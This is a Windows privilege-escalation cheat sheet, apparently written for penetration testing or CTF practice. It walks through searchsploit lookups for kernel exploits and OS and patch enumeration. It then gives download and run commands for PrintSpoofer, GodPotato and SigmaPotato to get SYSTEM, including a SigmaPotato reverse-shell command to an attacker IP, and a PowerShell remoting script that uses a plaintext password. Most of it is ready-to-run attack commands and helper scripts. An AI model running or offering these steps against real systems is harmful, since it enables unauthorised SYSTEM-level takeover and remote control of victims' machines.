Windows

Online Resource

Finding Kernel Exploits

SearchSploit:
 searchsploit <keyword>
 searchsploit -m <EDB-ID>
     # Copy (mirror) the exploit file for the given Exploit-DB ID into the current directory

For Kernel Vulnerabilities:
 searchsploit "windows kernel <keyword> Local Privilege Escalation"

 Identify <OS Name>, <OS Version> (the build number is the last part of it), and <OS Architecture> to fill in <keyword> with -
  systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
    OR
  wmic os get Caption,Version,OSArchitecture
  (wmic is deprecated on current Windows builds; if it is missing, use PowerShell: Get-CimInstance Win32_OperatingSystem | Select-Object Caption,Version,BuildNumber,OSArchitecture)

  Example: searchsploit "windows kernel Build XXXXX Local Privilege Escalation"
  Also check installed patches (systeminfo lists hotfixes; or Get-HotFix) so you don't waste time on an LPE whose KB is already applied.
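The following is an added PowerShell example (not part of the original notes) that gathers the same OS facts in one go on the target, lists the most recent hotfixes, and prints ready-to-paste searchsploit queries for the attacker box. It assumes PowerShell 3 or later (for Get-CimInstance); the way it trims the edition name from the caption is a heuristic, not a searchsploit feature.

```powershell
# Added example: collect OS name, version, build and architecture for a
# searchsploit query, plus recent hotfixes. Not from the original notes.
$os = Get-CimInstance -ClassName Win32_OperatingSystem

# Summary of what the "Finding Kernel Exploits" step needs
[pscustomobject]@{
    Name         = $os.Caption          # e.g. Microsoft Windows 10 Pro
    Version      = $os.Version          # e.g. 10.0.19045
    Build        = $os.BuildNumber      # e.g. 19045
    Architecture = $os.OSArchitecture   # e.g. 64-bit
    LastBoot     = $os.LastBootUpTime   # old uptime often means reboot-pending patches
} | Format-List

# Newest installed patches first: the most recent KB date bounds which LPEs are still unpatched
Get-HotFix |
    Sort-Object -Property InstalledOn -Descending |
    Select-Object -Property HotFixID, Description, InstalledOn -First 10 |
    Format-Table -AutoSize

# Strip "Microsoft" and the edition suffix so the query is not over-specific
# (searchsploit ANDs every word in the search string). Heuristic, assumption.
$product = $os.Caption -replace '^Microsoft\s+', '' `
                       -replace '\s+(Pro|Home|Enterprise|Education|Standard|Datacenter|Essentials).*$', ''
$arch = if ($os.OSArchitecture -like '64*') { 'x64' } else { 'x86' }

# Queries to run on the attacker machine, from broad to narrow
@(
    "searchsploit `"windows kernel $($os.BuildNumber) Local Privilege Escalation`""
    "searchsploit `"$product $arch Local Privilege Escalation`""
    "searchsploit `"$product Local Privilege Escalation`""
)
```

Run it from the shell you already have on the box; it writes nothing to disk. Compare the KB dates against the publication date of any candidate exploit before transferring it.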

Exploit Permissions

SeImpersonatePrivilege

PrintSpoofer:
    wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer64.exe
        OR
    wget https://github.com/itm4n/PrintSpoofer/releases/download/v1.0/PrintSpoofer32.exe
        # Download on the attacker box (match the target's architecture), then transfer it to the target
    
    PrintSpoofer.exe -i -c <command>
        # Execute a command as SYSTEM, interacting with it in the current console (-i)
    PrintSpoofer.exe -c cmd
        # Spawn a command prompt as SYSTEM in the current session
    PrintSpoofer.exe -d <session id> -c "powershell -ep bypass"
        # Spawn a SYSTEM process on the desktop of the given session (useful from an RDP/console session)
        # Identify your session ID with - qwinsta (the ID column of the line marked with ">")

GodPotato.exe:
    wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET2.exe
    wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe
    wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET35.exe
        # Pick the build matching a .NET Framework installed on the target. Verify with -
        # reg query "HKLM\SOFTWARE\Microsoft\NET Framework Setup\NDP" /s
        # (v4\Full -> NET4, v3.5 -> NET35, v2.0.50727 -> NET2)
        
    ./GodPotato-NET4.exe -cmd "<command>"
        # Execute a command as SYSTEM (e.g. -cmd "cmd /c whoami")

SigmaPotato.exe:
    wget https://github.com/tylerdotrar/SigmaPotato/releases/download/v1.2.6/SigmaPotato.exe
    ./SigmaPotato.exe <command>
        # Execute a Command
    ./SigmaPotato.exe --revshell <ip_addr> <port>
        # Establish a PowerShell Reverse Shell
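Before dropping any of the Potato binaries above, it is worth confirming the prerequisite and picking the right GodPotato build in one step. The following PowerShell is an added example (not from the original notes or any of the tool projects): it checks the current token for SeImpersonatePrivilege (and SeAssignPrimaryTokenPrivilege, the other privilege these tools can abuse), reads the installed .NET Framework versions from the NDP registry key, and names the GodPotato asset to use. The file names are the v1.20 release assets listed above; the selection logic and the sample command are assumptions.

```powershell
# Added example: check impersonation privileges and choose a GodPotato build.
# Not part of the original notes.

# 1. Token privileges. whoami /priv lists the privilege even when it is Disabled;
#    the Potato family only needs it to be present in the token.
$privs = whoami /priv
$hasImpersonate = $privs | Select-String -Pattern '^SeImpersonatePrivilege\s' -Quiet
$hasAssign      = $privs | Select-String -Pattern '^SeAssignPrimaryTokenPrivilege\s' -Quiet

if (-not ($hasImpersonate -or $hasAssign)) {
    Write-Warning 'Neither SeImpersonatePrivilege nor SeAssignPrimaryTokenPrivilege is present; Potato-style escalation will not work from this token.'
    return
}
$privs | Select-String -Pattern 'SeImpersonatePrivilege|SeAssignPrimaryTokenPrivilege'

# 2. Installed .NET Framework versions (same key as the reg query in the notes).
#    Install = 1 under each subkey means that runtime is present.
$ndp = 'HKLM:\SOFTWARE\Microsoft\NET Framework Setup\NDP'
$v2  = Get-ItemProperty -Path "$ndp\v2.0.50727" -ErrorAction SilentlyContinue
$v35 = Get-ItemProperty -Path "$ndp\v3.5"       -ErrorAction SilentlyContinue
$v4  = Get-ItemProperty -Path "$ndp\v4\Full"    -ErrorAction SilentlyContinue

$installed = @()
if ($v2.Install  -eq 1) { $installed += "2.0 ($($v2.Version))" }
if ($v35.Install -eq 1) { $installed += "3.5 ($($v35.Version))" }
if ($v4.Install  -eq 1) { $installed += "4.x ($($v4.Version), release $($v4.Release))" }
"Installed .NET Framework: " + ($installed -join ', ')

# 3. Prefer the newest runtime that is actually present (selection rule is an assumption).
$binary = $null
if ($v2.Install  -eq 1) { $binary = 'GodPotato-NET2.exe' }
if ($v35.Install -eq 1) { $binary = 'GodPotato-NET35.exe' }
if ($v4.Install  -eq 1) { $binary = 'GodPotato-NET4.exe' }

if ($binary) {
    "Use: .\$binary -cmd `"cmd /c whoami`""
} else {
    Write-Warning 'No .NET Framework install found; use PrintSpoofer (native) instead.'
}
```

If only SeAssignPrimaryTokenPrivilege is present, the same tools still apply, but start with a `whoami /priv` sanity check in the new SYSTEM shell to confirm the escalation actually succeeded before going further.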

Script to Create PS session

$username = "<username>"          # use DOMAIN\user or COMPUTER\user for a non-domain account
$password = "<password>"
$secureString = ConvertTo-SecureString $password -AsPlainText -Force
$credential = New-Object System.Management.Automation.PSCredential ($username, $secureString)

# LEGACY is the example target host name; WinRM (TCP 5985/5986) must be reachable on it
$session = New-PSSession -ComputerName LEGACY -Credential $credential

To access the session: Enter-PSSession -Session $session
    (or list sessions with Get-PSSession and use Enter-PSSession -Id <id>; remove it afterwards with Remove-PSSession $session)
